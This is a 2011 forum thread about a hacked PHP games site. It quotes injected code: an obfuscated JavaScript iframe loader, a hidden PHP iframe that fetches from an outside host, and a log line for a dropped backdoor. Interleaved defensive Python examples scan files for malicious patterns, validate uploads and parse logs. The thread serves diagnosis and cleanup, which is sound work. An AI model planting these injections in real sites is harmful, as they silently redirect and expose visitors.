hedgehog90 Posted June 2, 2011
My website this morning was displaying 2 iframes that I know I never put there in the code.

In index.php:
<script type="text/javascript" charset="ISO-8859-1" src="game.js"></script>

and in my public_html, there was a file called game.js that contained the following:
O="=100%iframewidthheig".split('');Q="document.write('< src=http://lolkatdska.co.in/sTDS/go.php?sid=1 ht frameborder=0 margin=0 marginht=0></>');";o="";for(J=3;J>-1;J--)Q=Q.split(o.charAt(J)).join(O[J]);eval(Q.replace(//g,'"'));

I am the only person with the login details to my website/cpanel, and I know I never uploaded/modified these files. I've spoken to my host, but they told me they didn't see anything (because obviously I removed these foreign objects as soon as I noticed them). They don't seem too bothered about a security risk :/ Anyway, I've changed my login details and all that.

I mentioned above that I discovered 2 foreign iframes; the other one I found just a moment ago, again on my index page (but within a file called footer.php).

In footer.php:
<iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe>

How did I not notice this before??? I think it was placed there in the last hour or so, after I removed the first iframe. This is pretty weird; I changed my login details for cpanel/ftp and all that stuff over an hour ago!!! and since then I've found this new alteration that I never made! I dunno, maybe it was there along with the game.js iframe but I didn't notice.... but as soon as I fixed the first one, I checked, and everything was fine.

Oh, and also, the php files index and footer now have twice the number of returns as they originally did.

e.g.:
<h1><?php include("ads/index_160x600_1.php"); ?></h1>
<h2><?php include("ads/index_125x125_1.php"); ?></h2>
<h3><?php include("ads/index_125x125_2.php"); ?></h3>

Became:
<h1><?php include("ads/index_160x600_1.php"); ?></h1>

<h2><?php include("ads/index_125x125_1.php"); ?></h2>

<h3><?php include("ads/index_125x125_2.php"); ?></h3>

The only way these files could have been altered is if someone knows my login details... but this just is impossible, how did this happen? Are any of these weird files/modifications familiar to anyone else?

We had a problem with the site a month ago when google suspected our site as some sort of security threat... because we were hosting content from xxxxxxxxx.com, a site we have no affiliation with and that doesn't feature on our site at all. It was all quite bizarre and the google thing went away within a day of contacting them. I have a feeling the same person/thing was behind this also. HELP!
Link to comment: https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/
teynon Posted June 2, 2011
Are you using a content management system or anything like that? They are either getting into your system through the server via FTP or Cpanel, or they are hacking a poorly coded content management system.
kenrbnsn Posted June 2, 2011
If you're not using SSH & SFTP for login and file transfer, start using them immediately, preferably using keys, not passwords. Your host should disable inbound telnet & ftp. Your server may have been "rooted", i.e. when the first break-in occurred, a rogue program was installed which allows the scammers to get in and change your code whenever they want. The whole file system needs to be scanned for these rogue programs -- they can be very difficult to find. If your current host doesn't want to deal with your problem (it's their problem too), move to another host. BTW, when posting code in this forum, please put the code between tags.
Ken
hedgehog90 (Author) Posted June 2, 2011
Okay, well it's certainly been rooted. Just found this in footer.php since deleting the last one:
<iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe>
Please, tell me how I can get rid of this for good. Btw, I've tried SSH & SFTP in filezilla, but it can never connect. Also, I'm with Hostgator.
teynon Posted June 2, 2011
First of all, you should immediately take your website offline. Either park the domain name temporarily or advise hostgator of what is going on specifically. If they refuse to cooperate, take your business elsewhere. Personally, I would have taken my business elsewhere as soon as they told me that nothing was wrong. It could still be a content management system if you are using something like that.
hedgehog90 (Author) Posted June 2, 2011
I've emailed hostgator once again with further information, and a link to this thread. I've decided not to take the site down temporarily, that seems like quite a massive thing to do for such a small problem. Well, unless it's not as small as I think?
kenrbnsn Posted June 2, 2011
It's not a small problem. You don't know what the scammers are doing with the data they are collecting. They could be keylogging everything that is typed, they could also be sending out spam from your site. That happened to me a few years ago and got my domain blacklisted. It took months to get the domain off the blacklists.
Ken
Philip Posted June 2, 2011
Look through your files (any other unknown files) for a backdoor. It isn't hard to create a PHP file that automatically adds or changes files upon request. If your current host doesn't want to deal with your problem (it's their problem too), move to another host.
teynon Posted June 2, 2011
I would still strongly recommend taking your site down. Or at least backing up and removing all the files online temporarily. You are potentially hurting all of your viewers and with the way the government is, you could even get in trouble if the bad guys are being bad enough. Either way, it's always better to be safe. I promise you if someone goes to your site and gets a virus, that's probably the last time they will ever visit your site. And don't think they'll recommend it to anyone else either.
scuarplex Posted June 2, 2011
Check your apache log. Are you using any kind of premade CMS or something like that?
ram4nd Posted June 2, 2011
Change passwords and use a secure operating system.
hedgehog90 (Author) Posted June 2, 2011
Oh, silly me, I haven't mentioned yet the url of my website: www.gpstudios.com
If by CMS you mean a back-end, then yes, however it can't add to files like index.php or anything like that. It's a games website. The backend allows me to upload/delete games and little else. The hacker must have gotten in through FTP. I have changed the password to the server account. I use Windows 7.... is that secure enough? I'm quite confident that my computer doesn't have any viruses or trojans. Can someone please explain to me how someone can get my personal details/upload files to the server space without my permission? I understand that hacking exists, but I've never truly gotten my head round how websites are hacked into without a data leak?
teynon Posted June 2, 2011
Yeah, you need to change the passwords for EVERYTHING. Your CMS needs new passwords and you need to check the CMS login logs.
hedgehog90 (Author) Posted June 2, 2011
I changed the password and username for my CMS earlier today, but as I just said (in my edited post), the hacking was certainly not done through the CMS. It's not capable of uploading anything but swfs, text and pictures.
xyph Posted June 2, 2011
Check your SQL database. It could be injected in there, as anything you echo from your database that you didn't perform htmlentities/etc on could contain rogue markup/scripting. Also, delete your entire site and re-upload a clean version. A file system compromise means there could be embedded code in ANY of your web-accessible PHP files that could allow attackers to upload anything they want to your server, or change any code in any file. A single hole generally leads to the attacker opening up many more in case the one they're using gets closed.
hedgehog90 (Author) Posted June 2, 2011
What search term should I search for in mySQL? Download the site and reupload it? I'm sorry, but I really don't see the sense in that; also, due to the amount of data on the website, it would take my internet connection 10s of hours to do this. This would be a last resort, it would be such a massive job. Hostgator are helping me at the moment, hopefully they'll sort it out to some degree.
xyph Posted June 2, 2011
MySQL: you want to find any HTML in cells that might be echoed. Look for malicious markup. We're trying to help. Cut your losses and do it. Next time hire a developer who knows how to deal with attackers. It's pretty much like dealing with an infected Windows system. I could spend tens of hours hunting for every hole the malware has opened, possibly not getting everything, or I could spend tens of hours backing up uninfected data, wiping the system, and reinstalling all the software/restoring backups and know I've got a clean start... Before you reupload I would find the hole in your script that allowed the initial attack.
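One way to do the backdoor hunt Philip describes and the file and database scan xyph recommends, as an added example (not code from the thread): the indicators are the things actually found on the site above (a hidden iframe, a remote file_get_contents(), an eval() of an obfuscated string) plus the decoders a PHP backdoor commonly wraps its payload in. The sample files and rows are constructed; the games table and its column names are assumptions.

```python
import re

# Indicators drawn from what was actually found on the site in this thread (a hidden iframe,
# remote content pulled in with file_get_contents(), an eval() of an obfuscated string) plus
# the decoders a PHP backdoor typically wraps its payload in. Each is scanned per line.
INDICATORS = {
    "hidden_iframe": re.compile(r"<iframe\b.*?\b(width|height)\s*=\s*['\"]?0\b", re.I),
    "remote_include": re.compile(r"\b(file_get_contents|include|require)(_once)?\s*\(\s*['\"]?https?://", re.I),
    "eval_call": re.compile(r"\beval\s*\(", re.I),
    "encoded_payload": re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "remote_script": re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?https?://", re.I),
}

def scan_text(text, label):
    """Return (label, indicator, line_no, snippet) for every indicator hit in one file or DB cell."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS.items():
            m = rx.search(line)
            if m:
                hits.append((label, name, n, line[max(0, m.start() - 20):m.end() + 40].strip()))
    return hits

def scan_files(files):
    """files: mapping of path -> contents (in real use, read every .php/.js/.html under the web root)."""
    return [h for path, text in files.items() for h in scan_text(text, path)]

def scan_rows(table, rows, text_columns):
    """rows: dicts as a DB driver returns them; only the text columns that get echoed are scanned."""
    hits = []
    for i, row in enumerate(rows):
        for col in text_columns:
            hits.extend(scan_text(str(row.get(col, "")), f"{table}[{i}].{col}"))
    return hits

# Constructed samples: the injected footer line from the thread, a clean include line, and
# a made-up games table with one description that carries a remote script tag.
SAMPLE_FILES = {
    "footer.php": "<div id=\"footer\">...</div>\n<iframe src=\"<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>\" width=0 height=0 border=0></iframe>\n",
    "index.php": "<?php include(\"ads/index_160x600_1.php\"); ?>\n",
}
SAMPLE_ROWS = [
    {"title": "Bubble Pop", "description": "A harmless puzzle game."},
    {"title": "Tower", "description": "Play now! <script src=\"http://example.invalid/x.js\"></script>"},
]
```

Every hit is a line to read by hand, not proof of compromise; legitimate ad includes and embeds will show up too, which is why the snippet and line number are returned with each finding.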
Pikachu2000 Posted June 2, 2011
You came here asking for help, and it seems like no matter what is suggested, you don't want to do it for some lame reason or another. You're just going to keep having the same problem over and over again, and it will be your own fault.
scuarplex Posted June 2, 2011
This looks like an automated attack of some Russian spammer. Check your apache logs in the time that your files were modified and you'll know exactly how they do it. Also check your upload folder to see if you find any strange file. Uploaders can be bypassed depending on how you code it.
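An added example of the kind of upload check scuarplex is getting at (not the site's own code, and written in Python rather than PHP): an extension allowlist built from the file types the back-end is said to accept (swfs, text, pictures), rejection of an executable extension anywhere in the name, a magic-byte check on the content, and a random server-side name so the uploader picks neither the path nor the filename. The allowed types, size limit and helper names are assumptions.

```python
import os
import secrets

# What the games back-end is said to accept (swfs, text, pictures), with the magic bytes each starts with.
# These types and the size limit are assumptions for the example.
ALLOWED = {
    "swf": (b"FWS", b"CWS", b"ZWS"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "txt": (),   # no magic bytes; content is checked for PHP tags and binary data instead
}
# Extensions the web server may execute if they appear anywhere in the name (game.php.swf, .htaccess).
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar", "htaccess", "cgi", "pl"}

class RejectedUpload(ValueError):
    pass

def validate_upload(client_name, data, max_bytes=20 * 1024 * 1024):
    """Return a safe server-side filename for the upload, or raise RejectedUpload.
    The client's name is never used on disk: only its extension is checked, and the stored
    name is random, so the uploader chooses neither the directory nor the file name."""
    if len(data) > max_bytes:
        raise RejectedUpload("too large")
    base = os.path.basename(client_name.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or any(p in EXECUTABLE for p in parts[1:]):
        raise RejectedUpload(f"disallowed name: {client_name!r}")
    ext = parts[-1]
    if ext not in ALLOWED:
        raise RejectedUpload(f"extension not allowed: .{ext}")
    magics = ALLOWED[ext]
    if magics and not data.startswith(magics):
        raise RejectedUpload(f"content does not look like a .{ext} file")
    if ext == "txt" and (b"<?" in data or b"\x00" in data):
        raise RejectedUpload("text upload contains PHP tags or binary data")
    return f"{secrets.token_hex(16)}.{ext}"   # random name, fixed extension, no user-chosen path

def is_accepted(client_name, data):
    """Convenience wrapper: True if validate_upload() would accept the file."""
    try:
        validate_upload(client_name, data)
        return True
    except RejectedUpload:
        return False
```

The returned name should be written into a directory that the web server is configured not to execute scripts from, with mode 644, which is the other half of the protection.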
teynon Posted June 2, 2011
Might I mention this has nothing to do with PHP coding help?
Pikachu2000 Posted June 2, 2011
You can mention it, but I don't think that can be firmly concluded yet. However since the OP hasn't provided any code, I'm moving the thread to miscellaneous.
scuarplex Posted June 2, 2011
One more thing, update your phpBB3 forum! It's pretty old, and there are already a few XSS in the wild that affect it.
hedgehog90 (Author) Posted June 2, 2011
> One more thing, update your phpBB3 forum! It's pretty old, and there are already a few XSS in the wild that affect it.
I updated it this morning because I read that it might have been the problem. It's up to date, I'm on 3.0.8.
hedgehog90 (Author) Posted June 3, 2011
Ok, I've found something. I was going through the logs, and I found the first occurrence of the game.js file being loaded. I looked back a few seconds before this and found a "POST" that said:
188.226.15.54 - - [31/May/2011:09:49:25 -0500] "POST /games/files/w/w.php HTTP/1.1" 200 12970 "http://www.gpstudios.com/games/files/w/w.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24"
I looked inside the /games/files/w/ and sure enough, there it was. I've attached it to show it to you. I have no idea how this was uploaded. It means it was likely done on the back-end and not through ftp, but the script for uploading new games does not allow the upload of php files, and it's not recorded by mySQL :/ .... I've just been thinking, how could the person who uploaded that file run it? Anything within /games/ is inaccessible because I had locked directory indexing (going through folders like a contents page) in the htaccess file... but last night I noticed my htaccess had disappeared! I didn't even relate it to the apparent hacking I had spent all day trying to fix. I re-uploaded an old one and didn't think any more about it. It must have been deleted by the person who uploaded it, and then the script was run.... I can't see how it could have been uploaded through the back-end... the only evidence for it is that the w.php file is within a folder called w, which is exactly the same format as the games files. Help, please.
[attachment deleted by admin]
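The log triage hedgehog90 did by hand, as an added example (not code from the thread): parse Apache combined-format lines, list every hit on a .php file under the upload directory, and show what reached the server in the seconds before game.js was first requested. The sample log is constructed around the one real line quoted above; the other three lines and the 203.0.113.x addresses are made up, and /games/files/ is assumed to be the only upload directory.

```python
import re
from datetime import datetime, timedelta

# Apache "combined" log format; this matches the line hedgehog90 quoted from his server.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumption: the only directory that takes uploads. Game assets belong there, scripts never do.
UPLOAD_DIRS = ("/games/files/",)

# Constructed sample: the real POST from the thread plus three made-up lines around it.
SAMPLE_LOG = """\
203.0.113.7 - - [31/May/2011:09:40:02 -0500] "GET /index.php HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
188.226.15.54 - - [31/May/2011:09:49:10 -0500] "GET /games/files/w/w.php HTTP/1.1" 200 12970 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24"
188.226.15.54 - - [31/May/2011:09:49:25 -0500] "POST /games/files/w/w.php HTTP/1.1" 200 12970 "http://www.gpstudios.com/games/files/w/w.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24"
203.0.113.9 - - [31/May/2011:09:49:40 -0500] "GET /game.js HTTP/1.1" 200 412 "http://www.gpstudios.com/index.php" "Mozilla/5.0"
"""

def parse_log(text):
    """Parse combined-format lines into dicts, time-sorted; lines that do not parse are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        rec["status"] = int(rec["status"])
        rec["path"] = rec["path"].split("?", 1)[0]   # drop the query string
        records.append(rec)
    return sorted(records, key=lambda r: r["ts"])

def scripts_in_upload_dirs(records):
    """Every hit on a .php file under an upload directory: the file should not exist, let alone run."""
    return [r for r in records
            if r["path"].lower().endswith(".php")
            and any(r["path"].startswith(d) for d in UPLOAD_DIRS)]

def first_request_for(records, path):
    hits = [r for r in records if r["path"] == path]
    return hits[0] if hits else None   # records are already time-sorted

def requests_before(records, anchor, seconds):
    """The window hedgehog90 searched by hand: what hit the server just before the injected file was first served."""
    start = anchor["ts"] - timedelta(seconds=seconds)
    return [r for r in records if start <= r["ts"] < anchor["ts"]]
```

On a real log, run scripts_in_upload_dirs() over the whole file first; the earliest hit tells you when the file appeared, and requests_before() around that timestamp shows what the back-end received just before it.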
kenrbnsn Posted June 3, 2011
You're not locking the directory from running scripts, you're locking a browser from getting a directory list. The hackers didn't have to get a list to see what was there, since they put the file there. If you don't want people to run scripts in a directory from a web browser, that directory needs to be outside the web root. What is the protection on the games directory? If it's 777, that means it's open to the world and the hackers could have gotten there from a different host on the shared host.
Ken
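An added example (not from the thread) of the audit kenrbnsn's two points call for: walk the web root and flag world-writable directories and files, script files sitting inside the upload tree, and an upload directory that has no .htaccess of its own. The tree it builds is constructed to mirror the thread; games/files as the only upload directory is an assumption.

```python
import os
import stat
import tempfile

UPLOAD_DIRS = ("games/files",)   # assumption: the only upload tree, relative to the web root
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")

def audit_webroot(webroot):
    """Walk the web root and return sorted (issue, relative_path) findings:
    world-writable dirs/files (on a shared host any other account can write there),
    script files inside the upload tree (a listing lock does not stop Apache running them),
    and an upload directory with no .htaccess of its own to turn PHP off."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot).replace(os.sep, "/")
        rel_dir = "" if rel_dir == "." else rel_dir
        in_upload = any(rel_dir == d or rel_dir.startswith(d + "/") for d in UPLOAD_DIRS)
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append(("world_writable_dir", rel_dir or "."))
        if rel_dir in UPLOAD_DIRS and ".htaccess" not in filenames:
            findings.append(("upload_dir_without_htaccess", rel_dir))
        for f in filenames:
            rel = f"{rel_dir}/{f}" if rel_dir else f
            if os.stat(os.path.join(dirpath, f)).st_mode & stat.S_IWOTH:
                findings.append(("world_writable_file", rel))
            if in_upload and f.lower().endswith(SCRIPT_EXTS):
                findings.append(("script_in_upload_dir", rel))
    return sorted(findings)

def build_sample_webroot():
    """Constructed tree mirroring the thread: games/files/w/w.php next to a legitimate game upload."""
    root = tempfile.mkdtemp()
    files = {"index.php": "<?php include(\"ads/index_160x600_1.php\"); ?>",
             "games/files/bubble/bubble.swf": "FWS",
             "games/files/w/w.php": "<?php /* stand-in for the unknown uploaded script */ ?>"}
    for rel, body in files.items():
        os.makedirs(os.path.join(root, os.path.dirname(rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    for dirpath, _dirs, filenames in os.walk(root):   # normalise modes so only the planted cases differ
        os.chmod(dirpath, 0o755)
        for f in filenames:
            os.chmod(os.path.join(dirpath, f), 0o644)
    os.chmod(os.path.join(root, "games", "files"), 0o777)              # the 777 case kenrbnsn asks about
    os.chmod(os.path.join(root, "games", "files", "w", "w.php"), 0o666)   # dropped file left world-writable
    return root
```

Turning directory listings off does nothing about execution; a .htaccess inside the upload directory itself with `php_flag engine off` (mod_php) is what stops Apache running whatever gets dropped there.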